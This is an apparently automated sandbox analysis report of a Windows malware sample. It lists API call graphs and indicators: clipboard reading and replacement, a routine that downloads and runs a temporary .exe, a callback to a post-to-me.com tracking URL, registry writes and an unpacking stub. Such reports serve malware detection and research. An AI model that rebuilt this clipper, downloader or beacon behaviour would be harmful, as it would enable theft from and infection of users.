64344->64286 64345->64293 64346->64301 64347->64293 64348->64297 64349->64305 64350->64302 64351->64304 64352->64308 64353->64319 64354->64314 64355->64317 64356->64319 64357->64332 64363 42e445 LeaveCriticalSection 64358->64363 64360 43989e 64360->64334 64361->64337 64362->64338 64363->64360 64364 43411a 64365 434126 ___BuildCatchObject 64364->64365 64366 434132 64365->64366 64367 434149 64365->64367 64398 42ead9 20 API calls 
__dosmaperr 64366->64398 64377 42cb0f EnterCriticalSection 64367->64377 64370 434159 64378 434196 64370->64378 64371 434137 64399 42a5ad 26 API calls _Deallocate 64371->64399 64374 434165 64400 43418c LeaveCriticalSection __fread_nolock 64374->64400 64376 434142 std::_Locinfo::_Locinfo_dtor 64377->64370 64379 4341a4 64378->64379 64380 4341be 64378->64380 64411 42ead9 20 API calls __dosmaperr 64379->64411 64401 432918 64380->64401 64383 4341a9 64412 42a5ad 26 API calls _Deallocate 64383->64412 64384 4341c7 64408 4347e3 64384->64408 64388 4342cb 64390 4342d8 64388->64390 64394 43427e 64388->64394 64389 43424f 64392 43426c 64389->64392 64389->64394 64414 42ead9 20 API calls __dosmaperr 64390->64414 64413 4344af 31 API calls 4 library calls 64392->64413 64395 4341b4 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 64394->64395 64415 43432b 30 API calls 2 library calls 64394->64415 64395->64374 64396 434276 64396->64395 64398->64371 64399->64376 64400->64376 64402 432924 64401->64402 64403 432939 64401->64403 64416 42ead9 20 API calls __dosmaperr 64402->64416 64403->64384 64405 432929 64417 42a5ad 26 API calls _Deallocate 64405->64417 64407 432934 64407->64384 64418 434660 64408->64418 64410 4341e3 64410->64388 64410->64389 64410->64395 64411->64383 64412->64395 64413->64396 64414->64395 64415->64395 64416->64405 64417->64407 64419 43466c ___BuildCatchObject 64418->64419 64420 434674 64419->64420 64421 43468c 64419->64421 64453 42eac6 20 API calls __dosmaperr 64420->64453 64423 434740 64421->64423 64428 4346c4 64421->64428 64458 42eac6 20 API calls __dosmaperr 64423->64458 64424 434679 64454 42ead9 20 API calls __dosmaperr 64424->64454 64427 434745 64459 42ead9 20 API calls __dosmaperr 64427->64459 64443 4396b4 EnterCriticalSection 64428->64443 64429 434681 std::_Locinfo::_Locinfo_dtor 64429->64410 64432 43474d 64460 42a5ad 26 API calls _Deallocate 64432->64460 64433 4346ca 64435 434703 64433->64435 64436 4346ee 64433->64436 64444 434765 64435->64444 64455 42ead9 20 API 
calls __dosmaperr 64436->64455 64439 4346f3 64456 42eac6 20 API calls __dosmaperr 64439->64456 64440 4346fe 64457 434738 LeaveCriticalSection __wsopen_s 64440->64457 64443->64433 64461 439931 64444->64461 64446 434777 64447 434790 SetFilePointerEx 64446->64447 64448 43477f 64446->64448 64450 434784 64447->64450 64451 4347a8 GetLastError 64447->64451 64474 42ead9 20 API calls __dosmaperr 64448->64474 64450->64440 64475 42eaa3 20 API calls __dosmaperr 64451->64475 64453->64424 64454->64429 64455->64439 64456->64440 64457->64429 64458->64427 64459->64432 64460->64429 64462 43993e 64461->64462 64464 439953 64461->64464 64476 42eac6 20 API calls __dosmaperr 64462->64476 64468 439978 64464->64468 64478 42eac6 20 API calls __dosmaperr 64464->64478 64465 439943 64477 42ead9 20 API calls __dosmaperr 64465->64477 64468->64446 64469 439983 64479 42ead9 20 API calls __dosmaperr 64469->64479 64470 43994b 64470->64446 64472 43998b 64480 42a5ad 26 API calls _Deallocate 64472->64480 64474->64450 64475->64450 64476->64465 64477->64470 64478->64469 64479->64472 64480->64470 64481 4023ab 64482 402572 PostQuitMessage 64481->64482 64483 4023bf 64481->64483 64485 402570 64482->64485 64484 4023c6 DefWindowProcW 64483->64484 64486 4023dd 64483->64486 64484->64485 64486->64485 64487 402a05 167 API calls 64486->64487 64487->64485 64488 40fc1c 64489 40fc28 ___BuildCatchObject 64488->64489 64517 410009 64489->64517 64491 40fc2f 64492 40fd82 64491->64492 64495 40fc59 64491->64495 64538 4104e3 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 64492->64538 64494 40fd89 64539 42ffd9 28 API calls _Atexit 64494->64539 64503 40fc98 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 64495->64503 64532 42fcfe 5 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 64495->64532 64497 40fd8f 64540 42ff8b 28 API calls _Atexit 64497->64540 64500 40fc72 64502 40fc78 64500->64502 64533 42fca2 5 API calls 
__ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 64500->64533 64501 40fd97 64505 40fcf9 64503->64505 64534 42a376 167 API calls 4 library calls 64503->64534 64528 4105fd 64505->64528 64508 40fcff 64509 40fd14 64508->64509 64535 410633 GetModuleHandleW 64509->64535 64511 40fd1b 64511->64494 64512 40fd1f 64511->64512 64513 40fd28 64512->64513 64536 42ff7c 28 API calls _Atexit 64512->64536 64537 410198 13 API calls 2 library calls 64513->64537 64516 40fd30 64516->64502 64518 410012 64517->64518 64541 41078b IsProcessorFeaturePresent 64518->64541 64520 41001e 64542 428837 10 API calls 3 library calls 64520->64542 64522 410023 64523 410027 64522->64523 64543 4317b1 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 64522->64543 64523->64491 64525 410030 64526 41003e 64525->64526 64544 428860 8 API calls 3 library calls 64525->64544 64526->64491 64545 426840 64528->64545 64531 410623 64531->64508 64532->64500 64533->64503 64534->64505 64535->64511 64536->64513 64537->64516 64538->64494 64539->64497 64540->64501 64541->64520 64542->64522 64543->64525 64544->64523 64546 410610 GetStartupInfoW 64545->64546 64546->64531 64547 4332ee 64548 4332fb 64547->64548 64552 433313 64547->64552 64597 42ead9 20 API calls __dosmaperr 64548->64597 64550 433300 64598 42a5ad 26 API calls _Deallocate 64550->64598 64553 43336e 64552->64553 64561 43330b 64552->64561 64599 434cdd 21 API calls 2 library calls 64552->64599 64555 432918 __fread_nolock 26 API calls 64553->64555 64556 433386 64555->64556 64567 432e26 64556->64567 64558 43338d 64559 432918 __fread_nolock 26 API calls 64558->64559 64558->64561 64560 4333b9 64559->64560 64560->64561 64562 432918 __fread_nolock 26 API calls 64560->64562 64563 4333c7 64562->64563 64563->64561 64564 432918 __fread_nolock 26 API calls 64563->64564 64565 4333d7 64564->64565 64566 432918 __fread_nolock 26 API calls 64565->64566 64566->64561 64568 432e32 ___BuildCatchObject 64567->64568 
64569 432e52 64568->64569 64570 432e3a 64568->64570 64571 432f18 64569->64571 64575 432e8b 64569->64575 64666 42eac6 20 API calls __dosmaperr 64570->64666 64673 42eac6 20 API calls __dosmaperr 64571->64673 64574 432e3f 64667 42ead9 20 API calls __dosmaperr 64574->64667 64578 432e9a 64575->64578 64579 432eaf 64575->64579 64576 432f1d 64674 42ead9 20 API calls __dosmaperr 64576->64674 64668 42eac6 20 API calls __dosmaperr 64578->64668 64600 4396b4 EnterCriticalSection 64579->64600 64583 432ea7 64675 42a5ad 26 API calls _Deallocate 64583->64675 64584 432e9f 64669 42ead9 20 API calls __dosmaperr 64584->64669 64585 432eb5 64588 432ed1 64585->64588 64589 432ee6 64585->64589 64586 432e47 std::_Locinfo::_Locinfo_dtor 64586->64558 64670 42ead9 20 API calls __dosmaperr 64588->64670 64601 432f39 64589->64601 64593 432ee1 64672 432f10 LeaveCriticalSection __wsopen_s 64593->64672 64594 432ed6 64671 42eac6 20 API calls __dosmaperr 64594->64671 64597->64550 64598->64561 64599->64553 64600->64585 64602 432f63 64601->64602 64603 432f4b 64601->64603 64605 4332cd 64602->64605 64610 432fa8 64602->64610 64685 42eac6 20 API calls __dosmaperr 64603->64685 64703 42eac6 20 API calls __dosmaperr 64605->64703 64606 432f50 64686 42ead9 20 API calls __dosmaperr 64606->64686 64609 4332d2 64704 42ead9 20 API calls __dosmaperr 64609->64704 64612 432fb3 64610->64612 64613 432f58 64610->64613 64617 432fe3 64610->64617 64687 42eac6 20 API calls __dosmaperr 64612->64687 64613->64593 64614 432fc0 64705 42a5ad 26 API calls _Deallocate 64614->64705 64616 432fb8 64688 42ead9 20 API calls __dosmaperr 64616->64688 64620 432ffc 64617->64620 64621 433022 64617->64621 64622 43303e 64617->64622 64620->64621 64626 433009 64620->64626 64689 42eac6 20 API calls __dosmaperr 64621->64689 64692 4336b7 21 API calls 3 library calls 64622->64692 64625 433027 64690 42ead9 20 API calls __dosmaperr 64625->64690 64676 43d375 64626->64676 64627 433055 64630 43347a _free 20 API calls 64627->64630 64633 43305e 64630->64633 
64631 4331a7 64634 43321d 64631->64634 64638 4331c0 GetConsoleMode 64631->64638 64632 43302e 64691 42a5ad 26 API calls _Deallocate 64632->64691 64636 43347a _free 20 API calls 64633->64636 64637 433221 ReadFile 64634->64637 64640 433065 64636->64640 64641 433295 GetLastError 64637->64641 64642 43323b 64637->64642 64638->64634 64639 4331d1 64638->64639 64639->64637 64643 4331d7 ReadConsoleW 64639->64643 64644 43308a 64640->64644 64645 43306f 64640->64645 64646 4332a2 64641->64646 64647 4331f9 64641->64647 64642->64641 64648 433212 64642->64648 64643->64648 64649 4331f3 GetLastError 64643->64649 64695 4347fe 64644->64695 64693 42ead9 20 API calls __dosmaperr 64645->64693 64701 42ead9 20 API calls __dosmaperr 64646->64701 64663 433039 __fread_nolock 64647->64663 64698 42eaa3 20 API calls __dosmaperr 64647->64698 64658 433260 64648->64658 64659 433277 64648->64659 64648->64663 64649->64647 64650 43347a _free 20 API calls 64650->64613 64655 433074 64694 42eac6 20 API calls __dosmaperr 64655->64694 64656 4332a7 64702 42eac6 20 API calls __dosmaperr 64656->64702 64699 432c55 31 API calls 2 library calls 64658->64699 64662 43328e 64659->64662 64659->64663 64700 432a95 29 API calls __fread_nolock 64662->64700 64663->64650 64665 433293 64665->64663 64666->64574 64667->64586 64668->64584 64669->64583 64670->64594 64671->64593 64672->64586 64673->64576 64674->64583 64675->64586 64677 43d382 64676->64677 64678 43d38f 64676->64678 64706 42ead9 20 API calls __dosmaperr 64677->64706 64680 43d39b 64678->64680 64707 42ead9 20 API calls __dosmaperr 64678->64707 64680->64631 64682 43d387 64682->64631 64683 43d3bc 64708 42a5ad 26 API calls _Deallocate 64683->64708 64685->64606 64686->64613 64687->64616 64688->64614 64689->64625 64690->64632 64691->64663 64692->64627 64693->64655 64694->64663 64696 434765 __fread_nolock 28 API calls 64695->64696 64697 434814 64696->64697 64697->64626 64698->64663 64699->64663 64700->64665 64701->64656 64702->64663 64703->64609 64704->64614 64705->64613 
64706->64682 64707->64683 64708->64682 64709 2c0d9de 64710 2c0d9ed 64709->64710 64713 2c0e17e 64710->64713 64714 2c0e199 64713->64714 64715 2c0e1a2 CreateToolhelp32Snapshot 64714->64715 64716 2c0e1be Module32First 64714->64716 64715->64714 64715->64716 64717 2c0d9f6 64716->64717 64718 2c0e1cd 64716->64718 64720 2c0de3d 64718->64720 64721 2c0de68 64720->64721 64722 2c0deb1 64721->64722 64723 2c0de79 VirtualAlloc 64721->64723 64722->64722 64723->64722 64724 402bbe RegCreateKeyExW 64725 402c00 64724->64725 64726 402bec RegSetValueExW 64724->64726 64727 402c05 RegCloseKey 64725->64727 64728 402c0e 64725->64728 64726->64725 64727->64728

Control-flow Graph

APIs
• __EH_prolog3_GS.LIBCMT ref: 004016EA
• Sleep.KERNEL32(00001541,0000004C), ref: 004016F4
  • Part of subcall function 0040CC26: _strlen.LIBCMT ref: 0040CC3D
• OpenClipboard.USER32(00000000), ref: 00401721
• GetClipboardData.USER32(00000001), ref: 00401731
• GlobalLock.KERNEL32(00000000), ref: 00401740
• _strlen.LIBCMT ref: 0040174D
• _strlen.LIBCMT ref: 0040177C
• _strlen.LIBCMT ref: 004018C0
• EmptyClipboard.USER32 ref: 004018D6
• GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004018E3
• GlobalLock.KERNEL32(00000000), ref: 00401901
• GlobalUnlock.KERNEL32(00000000), ref: 0040190D
• SetClipboardData.USER32(00000001,00000000), ref: 00401916
• GlobalFree.KERNEL32(00000000), ref: 0040191D
• CloseClipboard.USER32 ref: 00401941
• Sleep.KERNEL32(000002D2), ref: 0040194C
Strings
Memory Dump Source
• Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
Similarity
• API ID: ClipboardGlobal$_strlen$DataLockSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
• String ID: i
• API String ID: 1583243082-3865851505
• Opcode ID: 17d1fe9636891e7ab7a636a0232af5e3529bcbc6d572e399a941ee14b8431c0b
• Instruction ID: acef96f15b3fe231bab0a23a483f997ef62453455430a41aa2040eeb50028078
• Opcode Fuzzy Hash: 17d1fe9636891e7ab7a636a0232af5e3529bcbc6d572e399a941ee14b8431c0b
• Instruction Fuzzy Hash: 8351F631C00344DAE711DB64ED46BAD7764FF2A306F00523AE801722B3EB749A85C76D

Control-flow Graph

APIs
• InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402A28
• InternetOpenUrlW.WININET(00000000,0045D820,00000000,00000000,00000000,00000000), ref: 00402A3E
• GetTempPathW.KERNEL32(00000105,?), ref: 00402A5A
• GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00402A70
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00402AA9
• InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00402AE5
• WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00402B02
• CloseHandle.KERNEL32(00000000), ref: 00402B18
• ShellExecuteExW.SHELL32(?), ref: 00402B79
• WaitForSingleObject.KERNEL32(?,00008000), ref: 00402B8E
• CloseHandle.KERNEL32(?), ref: 00402B9A
• InternetCloseHandle.WININET(00000000), ref: 00402BA3
• InternetCloseHandle.WININET(00000000), ref: 00402BA6
Strings
Memory Dump Source
• Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
Similarity
• API ID: Internet$CloseFileHandle$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
• String ID: .exe$<$ShareScreen
• API String ID: 3323492106-493228180
• Opcode ID: fad9fd4f4bba5414a44c3c39901aae32f2f0ecd744b7d4f48afe0ae2e52c8d25
• Instruction ID: 435bcfbe32f51655d878697dd8351b2d9b102cba8eaff0ca6adad6bfe9ceff32
• Opcode Fuzzy Hash: fad9fd4f4bba5414a44c3c39901aae32f2f0ecd744b7d4f48afe0ae2e52c8d25
• Instruction Fuzzy Hash: 5141537190021CAEEB209F509D85FEA77BCFF05745F0080F6A549E2190DE749E858FA4
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02C0E1A6
• Module32First.KERNEL32(00000000,00000224), ref: 02C0E1C6
Memory Dump Source
• Source File: 00000000.00000002.4091760416.0000000002C0D000.00000040.00000020.00020000.00000000.sdmp, Offset: 02C0D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2c0d000_6X4BIzTTBR.jbxd
Yara matches
Similarity
• API ID: CreateFirstModule32SnapshotToolhelp32
• String ID:
• API String ID: 3833638111-0
• Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
• Instruction ID: 9eb2d1d829b8c1eb20b6d91b1fe7e387ac693b7381752163faaa00353561c0ac
• Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
• Instruction Fuzzy Hash: 90F096321407146FE7243BF59CCCBAE76E8AF89624F100928E652914C1DB70ED458A61

Control-flow Graph

APIs
  • Part of subcall function 0043CD1A: CreateFileW.KERNEL32(00000000,00000000,?,0043D0F5,?,?,00000000,?,0043D0F5,00000000,0000000C), ref: 0043CD37
• GetLastError.KERNEL32 ref: 0043D160
• __dosmaperr.LIBCMT ref: 0043D167
• GetFileType.KERNEL32(00000000), ref: 0043D173
• GetLastError.KERNEL32 ref: 0043D17D
• __dosmaperr.LIBCMT ref: 0043D186
• CloseHandle.KERNEL32(00000000), ref: 0043D1A6
• CloseHandle.KERNEL32(?), ref: 0043D2F0
• GetLastError.KERNEL32 ref: 0043D322
• __dosmaperr.LIBCMT ref: 0043D329
Strings
Memory Dump Source
• Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
Similarity
• API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
• String ID: H
• API String ID: 4237864984-2852464175
• Opcode ID: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
• Instruction ID: 9ea47a8c838bfa0642fa58bf6b528ca3bb2f39bbe3325b50c92cc96ec35dc4ac
• Opcode Fuzzy Hash: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
• Instruction Fuzzy Hash: 73A12432E141089FDF19AF68EC917AE7BA0AF0A324F14115EE8169B3D1D7389902C75A

Control-flow Graph

                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
                                                      • Instruction ID: 771be544e8584462915c4c8bf235ce765a173336d99d9e07edf5531b4c9f0108
                                                      • Opcode Fuzzy Hash: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
                                                      • Instruction Fuzzy Hash: 39C12670E04249AFDF11DFAAD841BAF7BB0BF0D316F14119AE81597392C3789A41CB69

                                                      Control-flow Graph

                                                      • Graph image not reproduced (legend: Executed / Not Executed). Basic blocks 46d003c-46d091d; API calls in graph: VirtualAlloc, VirtualProtect, VirtualFree, LoadLibraryA
                                                      APIs
                                                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 046D024D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID: cess$kernel32.dll
                                                      • API String ID: 4275171209-1230238691
                                                      • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                      • Instruction ID: 04d26f88f921edafd9078e74009a3848e0a5ea8b4592904e8189e6b27c8a28e5
                                                      • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                      • Instruction Fuzzy Hash: 5A525974E01229DFDB64CF58C984BA8BBB1BF09304F1480D9E94DAB351EB30AA85DF14

                                                      Control-flow Graph

                                                      APIs
                                                      • InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402C38
                                                        • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
                                                        • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
                                                      • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00402E50
                                                      • InternetCloseHandle.WININET(00000000), ref: 00402E61
                                                      • InternetCloseHandle.WININET(00000000), ref: 00402E64
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Internet$CloseHandleOpen_wcslen
                                                      • String ID: &cc=DE$ShareScreen$https://post-to-me.com/track_prt.php?sub=
                                                      • API String ID: 3067768807-1501832161
                                                      • Opcode ID: 0fb28128169c721122051566bee59eb9950ac0eccb46e1d2827a4400177e3e4a
                                                      • Instruction ID: 7046a9f85a47caeeee545fc214d33fb705a5988e90a24de57e131be2d788241c
                                                      • Opcode Fuzzy Hash: 0fb28128169c721122051566bee59eb9950ac0eccb46e1d2827a4400177e3e4a
                                                      • Instruction Fuzzy Hash: 80517295E65344A8E320EBB0BC56B323378EF58752F10543BE524CB2F2E3B19A44875E

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
                                                      • String ID:
                                                      • API String ID: 1687354797-0
                                                      • Opcode ID: 9bbf6c831fd912da87baf57c36a4887fcd0ef6c58bda06b470faafc8a7fe9ad1
                                                      • Instruction ID: f33cc807fcc9f1471242bb563c47589eb39ac817f40e532f8edcf8bb099f1083
                                                      • Opcode Fuzzy Hash: 9bbf6c831fd912da87baf57c36a4887fcd0ef6c58bda06b470faafc8a7fe9ad1
                                                      • Instruction Fuzzy Hash: E8216272C05208AADF15EBE9D845BDEB7F8AF08318F54407FE500B72C1DB7C8A448A69

                                                      Control-flow Graph

                                                      APIs
                                                      • GetLastError.KERNEL32(00457910,00000010,00000003,00431F6D), ref: 0042DFE3
                                                      • ExitThread.KERNEL32 ref: 0042DFEA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: ErrorExitLastThread
                                                      • String ID: "1@$W(@
                                                      • API String ID: 1611280651-1069126892
                                                      • Opcode ID: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
                                                      • Instruction ID: e32c967c61cfab7ac25fd58fcb876b017a95a0f88e1656cb846294c295b13e50
                                                      • Opcode Fuzzy Hash: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
                                                      • Instruction Fuzzy Hash: 32F0C871A00614AFDB04AFB1D806B6E3B70FF49715F10056EF4015B392CBB96955DB68

                                                      Control-flow Graph

                                                      APIs
                                                      • std::_Cnd_initX.LIBCPMT ref: 00405832
                                                      • __Cnd_signal.LIBCPMT ref: 0040583E
                                                      • std::_Cnd_initX.LIBCPMT ref: 00405853
                                                      • __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 0040585A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
                                                      • String ID:
                                                      • API String ID: 2059591211-0
                                                      • Opcode ID: 4bc96931a50e530a97df949a93d6c22699e5ffe5761425610e17c207007b84ce
                                                      • Instruction ID: 83daef3eed95e24e3e949fc9d85496ede2dd42c7ef54912cf65e476956e81272
                                                      • Opcode Fuzzy Hash: 4bc96931a50e530a97df949a93d6c22699e5ffe5761425610e17c207007b84ce
                                                      • Instruction Fuzzy Hash: 27F08C324007019BE7313B63C807B1A73A0AF00329F54883EF056769E2DFBEA8594A9D

                                                      Control-flow Graph

                                                      • Graph image not reproduced (legend: Executed / Not Executed). Basic blocks 402971-402a04; no direct API calls in graph, internal calls to 426840, 42a35b, 42b464, 402834, 404349, 40f8e5
                                                      APIs
                                                      • _wcslen.LIBCMT ref: 004029A0
                                                      • __fassign.LIBCMT ref: 004029B0
                                                        • Part of subcall function 00402834: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00402917
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Ios_base_dtor__fassign_wcslenstd::ios_base::_
                                                      • String ID: %+@
                                                      • API String ID: 2843524283-3245072864
                                                      • Opcode ID: 94cb3b79f98ead159861d7158de155055882d78918291c844945256c2dbf7a38
                                                      • Instruction ID: 90ed0d1f3f4a6b01ffd6285d26a76915e69f928962b748037eb715055e84f5de
                                                      • Opcode Fuzzy Hash: 94cb3b79f98ead159861d7158de155055882d78918291c844945256c2dbf7a38
                                                      • Instruction Fuzzy Hash: 3301FEB1E0011C96DB24E725EC46BEF77649F45308F0401FFD609E71C1D9795E45CA84

                                                      Control-flow Graph

                                                      • Graph image not reproduced (legend: Executed / Not Executed). Basic blocks 42e124-42e1a7; API calls in graph: CreateThread, GetLastError
                                                      APIs
                                                      • CreateThread.KERNEL32(?,?,Function_0002DFD0,00000000,?,?), ref: 0042E16D
                                                      • GetLastError.KERNEL32(?,?,?,?,?,0040CF24,00000000,00000000,?,?,00000000,?), ref: 0042E179
                                                      • __dosmaperr.LIBCMT ref: 0042E180
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: CreateErrorLastThread__dosmaperr
                                                      • String ID:
                                                      • API String ID: 2744730728-0
                                                      • Opcode ID: 6417039c3a419c6a23e66f93a220d1850b71fa34b27fbb0fc498c45cdaeb281c
                                                      • Instruction ID: c347c8df55ddf1e8bce98cd2287a220773076a2fddba34e4051567eb06b695c8
                                                      • Opcode Fuzzy Hash: 6417039c3a419c6a23e66f93a220d1850b71fa34b27fbb0fc498c45cdaeb281c
                                                      • Instruction Fuzzy Hash: 4401D236300229BBDB159FA3EC059AF3B69EF81320F40003AF90586210DB798921D7A8

                                                      Control-flow Graph

                                                      • Graph image not reproduced (legend: Executed / Not Executed). Basic blocks 434765-4347e2; API calls in graph: SetFilePointerEx, GetLastError
                                                      APIs
                                                      • SetFilePointerEx.KERNEL32(00000000,00000000,0040DDEB,00000000,00000002,0040DDEB,00000000,?,?,?,00434814,00000000,00000000,0040DDEB,00000002), ref: 0043479E
                                                      • GetLastError.KERNEL32(?,00434814,00000000,00000000,0040DDEB,00000002,?,0042C171,?,00000000,00000000,00000001,?,0040DDEB,?,0042C226), ref: 004347A8
                                                      • __dosmaperr.LIBCMT ref: 004347AF
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: ErrorFileLastPointer__dosmaperr
                                                      • String ID:
                                                      • API String ID: 2336955059-0
                                                      • Opcode ID: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
                                                      • Instruction ID: 8d7e534b68e51039b064944c18aa619c86eb292ce30b22a5ce389d7836f0c17b
                                                      • Opcode Fuzzy Hash: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
                                                      • Instruction Fuzzy Hash: 9A012836710514ABCB159FAADC058EE7B29EFCA730F24021AF81597290EB74ED518B94

                                                      Control-flow Graph

                                                      • Graph image not reproduced (legend: Executed / Not Executed). Basic blocks 402bbe-402c14; API calls in graph: RegCreateKeyExW, RegSetValueExW, RegCloseKey
                                                      APIs
                                                      • RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BE0
                                                      • RegSetValueExW.KERNEL32(?,?,00000000,00000001,?,00000004,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BF8
                                                      • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402C08
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: CloseCreateValue
                                                      • String ID:
                                                      • API String ID: 1818849710-0
                                                      • Opcode ID: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
                                                      • Instruction ID: d64ed0a5138aab8bb5e73f7f055b5b91d97832046820ac466d775150ee78820e
                                                      • Opcode Fuzzy Hash: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
